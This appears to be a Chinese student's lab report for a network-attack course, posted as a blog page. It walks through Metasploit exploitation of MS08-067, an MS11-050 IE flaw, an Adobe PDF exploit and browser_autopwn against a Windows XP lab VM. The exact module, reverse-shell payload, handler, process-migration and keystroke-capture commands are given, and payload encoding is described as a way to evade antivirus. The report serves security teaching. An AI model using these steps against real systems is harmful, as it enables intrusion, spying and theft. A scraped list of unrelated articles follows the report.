20145227鄢曼君《网络对抗》MSF基础应用
20145227鄢曼君《网络对抗》MSF基础应用
主动攻击:ms08_067漏洞攻击实践
- 两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。在VMware中设置两台虚拟机网络为NAT模式,让两台虚拟机ping通。
- 在kali终端中开启msfconsole。
- 输入命令
search ms08_067
,会显示出找到的渗透模块:
- 输入命令
use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用。 - 输入命令
show payloads
会显示出有效的攻击载荷,我们找到一个shell_reverse_tcp。
- 使用命令
set payload generic/shell_reverse_tcp
设置攻击有效载荷。 - 输入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip"
- 使用命令
show options
查看payload状态。
- 输入命令
exploit
开始攻击,攻击成功。
- 在kali上执行
ipconfig/all
得到如下图所示:
- 在win xp上执行同样的命令,如下图所示:
- 可以发现二者结果相同,说明成功攻击。
- 还可以进行MS08_067远程漏洞攻击实践:meterpreter
- 前面都和上面的步骤相同。设置payload:set payload windows/meterpreter/reverse_tcp
- 输入命令
exploit
开始攻击,攻击成功。
对浏览器攻击:MS11_050漏洞渗透攻击实践
- 两台虚拟机相互ping通。
- kali中开启
msfconsole
。由于这次做的是ms11_050漏洞攻击,输入命令use windows/browser/ms11_050_mshtml_cobjectelement
,使用该模块;info
即可查看关于该漏洞的信息
- 设置相关信息:
show options
查看设置好的相关信息:
exploit
,靶机访问的ip地址如图:
- 在靶机IE上输入网址,并在靶机上查看信息。
- 查看kali,显示一个session 1已经创建:
- 输入命令
sessions -i 1
,开始连接:
- 攻击成功。可以进行一些操作,比如获取shell
- 或者进行按键抓取:
Adobe阅读器渗透攻击
- kali下打开显示隐藏文件。
- 在kali终端中开启
msfconsole
- 输入命令
use exploit/windows/fileformat/adobe_cooltype_sing
,进入该漏洞模块的使用。 - 使用命令
set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷。 - 设置相关数据:
- 使用命令
show options
,看是否设置成功。
- 输入
exploit
,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。
- 使用
back
退出当前模块,并使用use exploit/multi/handler
新建一个监听模块。 - 使用
set payload windows/meterpreter/reverse_tcp
建立一个反向连接。注意的是,这里需要输入命令set LPORT 5227
和攻击模块里的数据设置为一样的。 - 使用命令
exploit
开始攻击,在xp中打开pdf。攻击成功结果如下图:
- 将进程迁移到explorer.exe.使用ps查看当前进程,并找到explorer.exe的进程号,如下图所示:
- 使用命令
migrate 296
成功后输入shell,可查看xp靶机信息。还可进行一些操作。
- 在靶机xp中使用命令
netstat -an
,看本地tcp连接。发现成功连接。
辅助模块应用:使用浏览器渗透攻击server/browser_autopwn 模块
- browser_autopwn 是 Metasploit 提供的辅助功能模块。在用户访问 Web 页面时,它会自动攻击受害者的浏览器。在开始攻击之前,browser_autopwn 能够检测用户使用的浏览器类型,根据浏览器的检测结果,自行部署最合适的 exploit。
- 这是针对浏览器程序本身的渗透攻击,主要利用浏览器本身的漏洞,如 IE 浏览器,经常由于自身安全漏洞导致攻击者能够构造恶意网页进行渗透攻击。
- 打开终端窗口,启动msfconsole,选择
server/browser——autopwn
模块,配置 LHOST、 SRVHOST 为主控端 IP,设置 URIPATH 为auto
。最后运行run
。
- 之后 metasploit 会自动生成利用浏览器本身的一些典型漏洞的网页,此处生成了 20 个。
- 在靶机 IE 浏览器地址栏输入“http://LHOST:8080/auto”
- 攻击成功。查看检测结果,可以看到kali向靶机发送了很多数据包,用于检测该漏洞是否能利用,实际上靶机是打开了很多个网页,访问了产生的20个页面。
- 可以进行一些操作:
- 或者执行
ipconfig
命令:
问题回答
用自己的话解释什么是exploit,payload,encode.
- exploit就相当于是一个运载的工具,将负责攻击的代码传送到靶机中。
- payload也就是负责攻击的代码,之前我们实验就做过。
- encode也就是编码,它主要有两个功能,一是为了避免之前的payload中出现坏字符,二就是它要伪装从而实现免杀,不让杀毒软件很轻易的就发现payload是攻击代码。
实验体会
- 这次实验最大的感受就是电脑有一个大的内存条是多么重要。之前做的时候同时开两个虚拟机电脑卡的要死,做一晚上只能做一点点,时间都浪费在等电脑反应上了。后面换了一个大的内存条,实验就很顺畅了。然后这次实验老师要求至少有一个和别人不一样,我觉得这点非常好,让我们在做的过程中能更多的去思考,而不是完全照着别人的过一遍而不思考。还有一个感受就是我们这次实验攻击的靶机都是xp系统,漏洞都是很早之前的,要想攻击现在的电脑可就没有这么容易了。有点期待下一周的任务了,又会有什么不一样的呢?
20145227鄢曼君《网络对抗》MSF基础应用的更多相关文章
- 20145227鄢曼君《网络对抗》Web安全基础实践
20145227鄢曼君<网络对抗>Web安全基础实践 实验后回答问题 1.SQL注入攻击原理,如何防御? SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是 ...
- 20145227鄢曼君《网络对抗》Web基础
20145227鄢曼君<网络对抗>Web基础 实验内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建 ...
- 20145227鄢曼君《网络对抗》逆向及Bof基础
20145227鄢曼君<网络对抗>逆向及Bof基础 实践目标 本次实践的对象是一个名为pwn1的linux可执行文件. 该程序正常执行流程是:main调用foo函数,foo函数会简单回显任 ...
- 20145227鄢曼君《网络对抗》shellcode注入&Return-to-libc攻击深入
20145227鄢曼君<网络对抗>shellcode注入&Return-to-libc攻击深入 shellcode注入实践 shellcode基础知识 Shellcode实际是一段 ...
- 网络对抗——web基础
网络对抗--web基础 实践内容 (1)Web前端HTML (2)Web前端javascipt (3)Web后端:MySQL基础:正常安装.启动MySQL,建库.创建用户.修改密码.建表 (4)Web ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019-2 20165325 《网络对抗技术》 Exp5:MSF基础应用
2018-2019-2 20165325 <网络对抗技术> Exp5:MSF基础应用 实验内容(概要) 1.1 一个主动攻击实践,本实验选择 ms17_010_eternalblue(成功 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
随机推荐
- git 出现 refusing to merge unrelated histories 解决
如果出现refusing to merge unrelated histories,使用以下方法即可 git pull origin master --allow-unrelated-historie ...
- Windows server 2016 安装及ORACLE 12C 安装
首先创建虚拟机,选择windows server 2016 启动虚拟机,进入安装界面,语言默认中文,选择下一步 选择标准安装(桌面) 选择接受条款 选择自定义安装 进行分区,如下图所示 进行安装 设定 ...
- hibernate注解(三)1+N问题
一.什么时候会遇到1+N的问题? 前提:Hibernate默认表与表的关联方法是fetch="select",不是fetch="join",这都是为了懒加载而准 ...
- shidebing——QandA:解决一个需求20171214
list1 = [ {'eip': 60, 'day': '2014-7-5'}, {'etans': 96, 'day': '2014-7-5'}, {'etans': 30, 'day': '20 ...
- OC 手势可能出现的问题
oc手势有分別是 Tap(点一下).Pinch(二指往內或往外拨动).Rotation(旋转).Swipe(滑动,快速移动).Pan (拖移,慢速移动)以及 LongPress(长按). UITapG ...
- 011-jdk1.8版本新特性三-Date API
1.7.Date API Java 8 在包java.time下包含了一组全新的时间日期API.新的日期API和开源的Joda-Time库差不多,但又不完全一样,下面的例子展示了这组新API里最重要的 ...
- HTML <input> 标签的 name 属性
定义和用法 name 属性规定 input 元素的名称. name 属性用于对提交到服务器后的表单数据进行标识,或者在客户端通过 JavaScript 引用表单数据. 注释:只有设置了 name 属性 ...
- The Air Jordan 11 Gym Red will be available December 9
A few years ago Carmelo Anthony set the internet on fire when he was spotted rocking a never before ...
- 问题排查之'org.apache.rocketmq.spring.starter.core.RocketMQTemplate' that could not be found.- Bean method 'rocketMQTemplate' in 'RocketMQAutoConfiguration' not loaded.
背景 今天将一个SpringBoot项目的配置参数从原有的.yml文件迁移到Apollo后,启动报错“Bean method 'rocketMQTemplate' in 'RocketMQAutoCo ...
- 209. Minimum Size Subarray Sum(双指针)
Given an array of n positive integers and a positive integer s, find the minimal length of a contigu ...